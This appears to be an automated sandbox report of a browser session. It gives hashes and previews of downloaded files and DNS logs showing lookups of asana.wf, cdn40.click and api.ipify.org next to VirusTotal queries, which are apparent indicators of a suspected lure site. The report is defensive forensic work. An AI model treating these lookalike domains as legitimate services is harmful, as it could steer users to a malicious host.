                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):45
                                                                                                                                                                                                                    Entropy (8bit):3.184885595704673
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:SERQwFkNjDKhn:3RT+NjDwn
                                                                                                                                                                                                                    MD5:3F5BF8AE841B11F22E0CE3ACB4CA7204
                                                                                                                                                                                                                    SHA1:DDBE96AAD6185EFBE77F5DEA6DFEFA10FC3EEE6B
                                                                                                                                                                                                                    SHA-256:67DEA4D2E0E48D070D599FC6E4B65D78A0D49A868441D1C22FB84BFFD1403F4A
                                                                                                                                                                                                                    SHA-512:D9525A031A95E1919E242AEBB459B96B02F3B7691166F05BD88A22CC06A4D35913A5D50031CCAB45F14633BF4A8635E9C966ACDF57536974EBC46F8506AFD403
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "data": {. "show": false. }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):159972
                                                                                                                                                                                                                    Entropy (8bit):4.561356170728541
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:EI7UvQ1FSOOy6ROZXADEEp20BZkeKlFqBxA0Id+xrJCEFjT:E8UvQLhk6oEEp28ZkeKlFqBC0HV
                                                                                                                                                                                                                    MD5:5A1043CC2664288A32D5487DEF17FF92
                                                                                                                                                                                                                    SHA1:ADB3BD8B0B34AF2D24C27B0F7203F694285436E7
                                                                                                                                                                                                                    SHA-256:8C35D507A6068E6F15128BD840FF7BB7471BCA5892BF1BF5033220BFD334080F
                                                                                                                                                                                                                    SHA-512:A0B222D555C8F35BC99B2FFDD3AD28FDBD7046B3EF5942953BBD1A3D0114E3F9304DFC4C01E58BCFD552392A5DE05292702B92A052578AB05CFFD6C5B2105961
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40
                                                                                                                                                                                                                    Preview:{. "data": [. {. "id": "76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox",. "type": "file_behaviour",. "links": {. "self": "https://www.virustotal.com/ui/file_behaviours/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358_CAPE Sandbox". },. "attributes": {. "calls_highlighted": [. "RtlWow64GetCurrentMachine",. "RtlWow64IsWowGuestMachineSupported". ],. "mbc": [. {. "id": "OB0001". },. {. "id": "B0001". },. {. "id": "B0001.009". },. {. "id": "B0002". },. {. "id": "B0002.008". },.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 8720
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):3923
                                                                                                                                                                                                                    Entropy (8bit):7.950962242073255
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:96:oqsQ3RokuKpmoVRkNnk6WWZ0OPtNX0Rvv7JPupsqK8:bsQhCWmveJLqtNXmvvFPuJ
                                                                                                                                                                                                                    MD5:1AFD8873A59692079E3E7449C25366BA
                                                                                                                                                                                                                    SHA1:F0E6CA4FD8A2E6FAA98779595AB0C6278A07DAC2
                                                                                                                                                                                                                    SHA-256:878ECA479BC372BE888B4FBCBDCB4E27B89518FDED1EC564D6FD02F88DA1A3C0
                                                                                                                                                                                                                    SHA-512:C27CE0C5C51C1E8C486FBF10B0D52DA2A317EED69A92849427F28372C1FA84595D5FD2EEE8EF60F43AA74480E1F909A0D72070A05B8F1FEFA172D9DF1C8DE13C
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/vt-ui-sw-installer.c228b2b19bd8517cfe55.js
                                                                                                                                                                                                                    Preview:...........Zms.6..~...u4.Bd.Nb)..M37.k.2Ur...s!...S........=......tb.../.}......^a.L.?.....VLW<.{.X....]..%.*..o...M.V.b.\_......D..7o_.....H...N0..0.,.L....,'.KU..eB....(.......G..=.......0..8x..4..}.#]..m.....V.4......7..m...7."..]9[...\y9...0k.<%..G./e!.....p.$...EQ.x..J.l..*...j.>..4..D.X....Ha`a..0...<...0l..N.Y...)..H.3,.jn.#..E....7...z)4.f"....#.\..|...".....t..h....G.0...H.K.L*./..6.PG.;q..l.,...ZgY.....J......5.X..<x.5...a.".Sbe.q.[I..d}1..._+.`.C..J.3or....~.Q..7...1...w.h.2Y8.*.....+.......}5o%....g..D.W.[....3..Nd...k."....F..p.V..$,..^O..A.:..p...:o..K.F..|e'...D..8v.....4./....LQ.|..`<.,...2xz.?~..u...}.+..n.o^2#....;..\..,.,.d.d..#.Bc......`E.bQ'..k.I.}..x..J....z:.lh..~..,K....&.'.......Ra......x&....O.o....$.Q.`..K.N...S|.....N...^n.....x.......(...0.<e~X....zb\..j.........Z<.L...6.]...,d1.......f.!T.........`G.J.X...]......c....4d.-f..R.~................6..vQ.'.J.jP.E!.*./...cAz..U......h.*A.b.B!WU\.[.F......4......`<...;
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 28767
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):8687
                                                                                                                                                                                                                    Entropy (8bit):7.974934109703384
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:w7LohFKERu6bfZReLGCXR+Us18K6yfc24CnUGVVgNzagGh/6Hw5ALHiPoqH:VnRugGIUUD6KTM2gGuHivH
                                                                                                                                                                                                                    MD5:4727E8629429CBDD3B160F621961F153
                                                                                                                                                                                                                    SHA1:6BA15EB507F02DB0730A9FE49EFB36E40F173C29
                                                                                                                                                                                                                    SHA-256:E8D3F16DFF94F52850C287E678EAB20E67E7771F33180589DDEF193ADEF799B0
                                                                                                                                                                                                                    SHA-512:E6157CE612C7279B0479305EA20765FA3533BC0529FA7CEE7A361B26E0E62D8BAC42D93063E5162FF5CD56C94BAE7DF656552D236A28D8111891469AC8513759
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/76446.6d2379a7770bf21c8233.js
                                                                                                                                                                                                                    Preview:...........]{.....?.....J...h`..=....93.&...G@.J..H...|...[..$..L.lNN.....Uu..}......Y4/Z.v..ep#f.p~.b.K....w..0J.......wn..................^.N....).i...t.]/...vw.t..=._.F....v..}.....p....G..%.8..0(..Qw.A..>.F......K.+|....m........U{..!0.....e7..._b..._...I,.g.]{w.w..z.yo.....Y6Y.y....Zn.+....../.;.j4....3B:...x'......D....:..N..C.,.D<.......M.. .y._SSP.E.....,..5.nl......(..i..v....D-...GM.n.Q41...Y.n..].....z..y.3/.Z..-Z...8Q..Xg......{p.......'1..K..X$.b.V...?..d....x^L...E.`%.oo..h+......h[...?.&..J...qw[....b.c..YK.....b.fa!..T..&..D...%......~w.=.v&....\..s...i.v..#..3....a...u..y..cB.....L.r!.Q"...8ov`.}5..a.;8..,rg......"...%.}..u.A..vp=b. /..).....mjS=Q.U.K./..i...&..k9&._a..4[....E.X...........],r,,.....`...R.x..m.].?.s.....4YF...]Q.Iu...n{.......??.1...../D^L[.%..w.8..-..0m....~.+b...f.&....o9...V..m...D.3..<.D...Q.9rr......?..%......."...\.4.+g.n..'..U.G......)2...sp...6...i......i.lw...2.E.YG..Hx...F..Y..t......k...
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1538), with no line terminators
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):1538
                                                                                                                                                                                                                    Entropy (8bit):5.905684786881501
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:VKEAhixKonjfcvtTARXx/g7b1Muh6LrwUnG:fAQgqMSNMMugsuG
                                                                                                                                                                                                                    MD5:AAD8BD07D0BF2FF8DFC1FB2A2E4A6D10
                                                                                                                                                                                                                    SHA1:084D15C7D1CE741D157316FFD3D6052082B9E986
                                                                                                                                                                                                                    SHA-256:B7F4F5094388066D84D52C6601EBE68AF7FFE784C93E112178465AD675251E08
                                                                                                                                                                                                                    SHA-512:6E1DDF66DADB6D16389BFC9CADB8A1EC2867BDC2BE652F38631FE930846B4187085DB193B7F1D0AD256866ED6E2388801B1689BE6A0456A9647D1E057E49E676
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.recaptcha.net/recaptcha/api.js?render=explicit
                                                                                                                                                                                                                    Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.recaptcha.net/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('explicit');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true;var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A89JPrWYXvEpNQ/xE+PjjlGJiBu/L2GfQcplC/QkDJOS1fBoX5Q4/HLfT1dXpD1td7C2peXE3bSCJiYdwoFcNgQAAACSeyJvcmlnaW4iOiJodHRwczovL3JlY2FwdGNoYS5uZXQ6NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);var m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='3NNj0GXVktLOmVKwWUDendk4Vq2qgMVDBDX+Sni48ATJl9JBj+zF+9W2HGB3pvt6qowOihTbQgTeBm9SKbdTwYAAABfeyJvcmlnaW4iOi
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):55373
                                                                                                                                                                                                                    Entropy (8bit):4.1707136366534625
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:N/fR7EMpDaO22Qvc0j1THD+1FafrWE1nkNnkHa7lbP7hB4DY5KDUzm8XncHESQAO:T7Ep3cFafSE1kNX4s5aUL7rdF5D
                                                                                                                                                                                                                    MD5:564209D6D81018343B88B2167C1D2F88
                                                                                                                                                                                                                    SHA1:80999771A8DD2DACF5E7AC07AACF47B6794B5634
                                                                                                                                                                                                                    SHA-256:0CF82FBE1CF07C4051CC1DE96AFC2504A775C837FC9BE9A1D7D109E454FD5FD6
                                                                                                                                                                                                                    SHA-512:E79218654FCB4F7A3E7E56B229F4FEEC0901EE21E803E2A96348111A2C7D4DA64F898DF37D3CEF528231FE79701B37AEC087B8582B1FCB6E5BD27B73E82A44BE
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mitre_trees
                                                                                                                                                                                                                    Preview:{. "data": {. "CAPE Sandbox": {. "tactics": [. {. "id": "TA0007",. "name": "Discovery",. "link": "https://attack.mitre.org/tactics/TA0007/",. "description": "The adversary is trying to figure out your environment.\n\nDiscovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what\u2019s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective. ",. "techniques": [. {. "id": "T1033",. "name": "System Owner/User Discovery",.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 23811
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):8769
                                                                                                                                                                                                                    Entropy (8bit):7.971636964998219
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:F4zg1mvzo957z5tdJm4r/6VwHE4TXeJmJ5+zieyyzdPLd:F4Omvo57jdE4/zeJmJqDyWNLd
                                                                                                                                                                                                                    MD5:A89A43D28E2E0ECC0CF3606A6DBECD54
                                                                                                                                                                                                                    SHA1:60230254F2785BCAE4642C54DBCABF1F64EB9DCE
                                                                                                                                                                                                                    SHA-256:19B7A1D3B08C31993EDA8FA05EC607D1FD823236E494A12662E53337FFFE3575
                                                                                                                                                                                                                    SHA-512:3A5B5319E3CF0173A0619A59382AFB3E564F79B313556ABCBA144C51238708E025BE866D1C0A1BEA4723CF29C9C94E69E6868373E826F75F8790F8BA15401959
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/67119.0f2e302c9bd4920403eb.js
                                                                                                                                                                                                                    Preview:...........|{..6....)To7..#it....'..M.\..v.=}ZY.mul..d2....R.<c9y.y...@.......l+.Uu....tX.....M...-...E..6.m.d..H.O..:27.j9.. ..H.m?.u.u.[.......v4.==.....c{......y...E....Pw.c'.#.... .#..}....};r....9.\[."...n.z`...$...v.0.]..=...u.1..<K...su'.,K.|..CJ...m...Q.x...!..Z("....Z...(..n8vl..CE. p.0.==....D~.C.>`..G?...y.........6~ ..Z..Q..,0..q.C....(...j.;c........G...4..R<.C..v.......vh...R<(C.....c..,.... ..h.0Db.....P.1.g.c4H.C.......F....m.....*G.."..Z.Dh.H..}.4j.._...4..K].&.n..R.'b...(..)...8.k...E.H..z..>.3....HO..nh.v.......J..J........b.8.R...6O..e.z>..S.....Z.ue.D...(.~......j5.L.....?DZ..Q....,..(..'.J.lS..*...|8(.t0....Q.7b.B.........H.2...(....{*V..s.F..&...O.G..43..0...d...<.V.!.".V..~D.d....h..S5:-E.-s....T...Z..<.ESK.O.nY..I.J.J.W..g.../...J..o.".,.MI%..j.5.M.l5..]f.Y%.lZ\.j........Z.&_.{D..z..j....mU'u.jh..f.+Q..Y.....6...8{.v4..?.n...r..ll(.tX.........+........B.o...Q.=..H.g.*bO...dXN..E...".i.....J..v].=.T.....>}...]
                                                                                                                                                                                                                    No static file info
                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Apr 25, 2024 21:54:53.768714905 CEST192.168.2.161.1.1.10x65c0Standard query (0)asana.wfA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:53.768867970 CEST192.168.2.161.1.1.10x4347Standard query (0)asana.wf65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:54.474322081 CEST192.168.2.161.1.1.10x3740Standard query (0)asana.wfA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:54.474493027 CEST192.168.2.161.1.1.10x3f21Standard query (0)asana.wf65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:56.462235928 CEST192.168.2.161.1.1.10x86b4Standard query (0)asana.wfA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:56.462554932 CEST192.168.2.161.1.1.10x9491Standard query (0)asana.wf65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:57.555470943 CEST192.168.2.161.1.1.10xf285Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:57.555974960 CEST192.168.2.161.1.1.10xa022Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.191802979 CEST192.168.2.161.1.1.10xa6cfStandard query (0)cdn40.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.191983938 CEST192.168.2.161.1.1.10x5c89Standard query (0)cdn40.click65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.211530924 CEST192.168.2.161.1.1.10xb4cdStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.211690903 CEST192.168.2.161.1.1.10xe085Standard query (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.522094011 CEST192.168.2.161.1.1.10x50c0Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.522248983 CEST192.168.2.161.1.1.10xbdd7Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:03.058017969 CEST192.168.2.161.1.1.10x7284Standard query (0)cdn40.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:03.058232069 CEST192.168.2.161.1.1.10x53f7Standard query (0)cdn40.click65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:13.524082899 CEST192.168.2.161.1.1.10x6d95Standard query (0)virustotal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:13.524244070 CEST192.168.2.161.1.1.10xdcfdStandard query (0)virustotal.com65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:14.163963079 CEST192.168.2.161.1.1.10x47deStandard query (0)www.virustotal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:14.164148092 CEST192.168.2.161.1.1.10xdfc8Standard query (0)www.virustotal.com65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:14.770101070 CEST192.168.2.161.1.1.10xfc32Standard query (0)www.recaptcha.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:14.770322084 CEST192.168.2.161.1.1.10x7cdaStandard query (0)www.recaptcha.net65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:16.264692068 CEST192.168.2.161.1.1.10x77aStandard query (0)recaptcha.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:16.264853954 CEST192.168.2.161.1.1.10xefb0Standard query (0)recaptcha.net65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:16.905950069 CEST192.168.2.161.1.1.10xa32dStandard query (0)recaptcha.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:16.906168938 CEST192.168.2.161.1.1.10xf849Standard query (0)recaptcha.net65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:16.929366112 CEST192.168.2.161.1.1.10x48d3Standard query (0)www.virustotal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:16.929517031 CEST192.168.2.161.1.1.10x8e40Standard query (0)www.virustotal.com65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:18.744873047 CEST192.168.2.161.1.1.10xf473Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:18.745029926 CEST192.168.2.161.1.1.10x318bStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:56:14.586045027 CEST192.168.2.161.1.1.10x39ccStandard query (0)www.virustotal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:56:14.586148024 CEST192.168.2.161.1.1.10x8d54Standard query (0)www.virustotal.com65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:56:20.665204048 CEST192.168.2.161.1.1.10x83c6Standard query (0)www.virustotal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:56:20.665374041 CEST192.168.2.161.1.1.10x5107Standard query (0)www.virustotal.com65IN (0x0001)false
                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Apr 25, 2024 21:54:54.205460072 CEST1.1.1.1192.168.2.160x65c0No error (0)asana.wf94.131.101.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:54.920542955 CEST1.1.1.1192.168.2.160x3740No error (0)asana.wf94.131.101.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:56.573555946 CEST1.1.1.1192.168.2.160x86b4No error (0)asana.wf94.131.101.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:57.665822029 CEST1.1.1.1192.168.2.160xf285No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:57.665822029 CEST1.1.1.1192.168.2.160xf285No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:57.665822029 CEST1.1.1.1192.168.2.160xf285No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:57.666311026 CEST1.1.1.1192.168.2.160xa022No error (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.321645975 CEST1.1.1.1192.168.2.160xb4cdNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.321645975 CEST1.1.1.1192.168.2.160xb4cdNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.321645975 CEST1.1.1.1192.168.2.160xb4cdNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.322187901 CEST1.1.1.1192.168.2.160xe085No error (0)api.ipify.org65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.622225046 CEST1.1.1.1192.168.2.160xa6cfNo error (0)cdn40.click23.133.88.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.632056952 CEST1.1.1.1192.168.2.160xbdd7No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.632642031 CEST1.1.1.1192.168.2.160x50c0No error (0)www.google.com64.233.185.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.632642031 CEST1.1.1.1192.168.2.160x50c0No error (0)www.google.com64.233.185.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.632642031 CEST1.1.1.1192.168.2.160x50c0No error (0)www.google.com64.233.185.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.632642031 CEST1.1.1.1192.168.2.160x50c0No error (0)www.google.com64.233.185.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.632642031 CEST1.1.1.1192.168.2.160x50c0No error (0)www.google.com64.233.185.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:54:58.632642031 CEST1.1.1.1192.168.2.160x50c0No error (0)www.google.com64.233.185.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:03.496306896 CEST1.1.1.1192.168.2.160x7284No error (0)cdn40.click23.133.88.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:13.636975050 CEST1.1.1.1192.168.2.160x6d95No error (0)virustotal.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:13.636975050 CEST1.1.1.1192.168.2.160x6d95No error (0)virustotal.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:13.636975050 CEST1.1.1.1192.168.2.160x6d95No error (0)virustotal.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:13.636975050 CEST1.1.1.1192.168.2.160x6d95No error (0)virustotal.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:14.275013924 CEST1.1.1.1192.168.2.160x47deNo error (0)www.virustotal.comghs-svc-https-c46.ghs-ssl.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:14.275013924 CEST1.1.1.1192.168.2.160x47deNo error (0)ghs-svc-https-c46.ghs-ssl.googlehosted.com74.125.34.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:14.280119896 CEST1.1.1.1192.168.2.160xdfc8No error (0)www.virustotal.comghs-svc-https-c46.ghs-ssl.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:14.880655050 CEST1.1.1.1192.168.2.160xfc32No error (0)www.recaptcha.net173.194.219.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:16.375205994 CEST1.1.1.1192.168.2.160x77aNo error (0)recaptcha.net64.233.176.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:17.026159048 CEST1.1.1.1192.168.2.160xa32dNo error (0)recaptcha.net64.233.176.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:17.046042919 CEST1.1.1.1192.168.2.160x8e40No error (0)www.virustotal.comghs-svc-https-c46.ghs-ssl.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:17.046741962 CEST1.1.1.1192.168.2.160x48d3No error (0)www.virustotal.comghs-svc-https-c46.ghs-ssl.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:17.046741962 CEST1.1.1.1192.168.2.160x48d3No error (0)ghs-svc-https-c46.ghs-ssl.googlehosted.com74.125.34.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:18.855324984 CEST1.1.1.1192.168.2.160xf473No error (0)www.google.com108.177.122.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Apr 25, 2024 21:55:18.855324984 CEST1.1.1.1192.168.2.160xf473No error (0)www.google.com108.177.122.147A (IP address)IN (0x0001)false
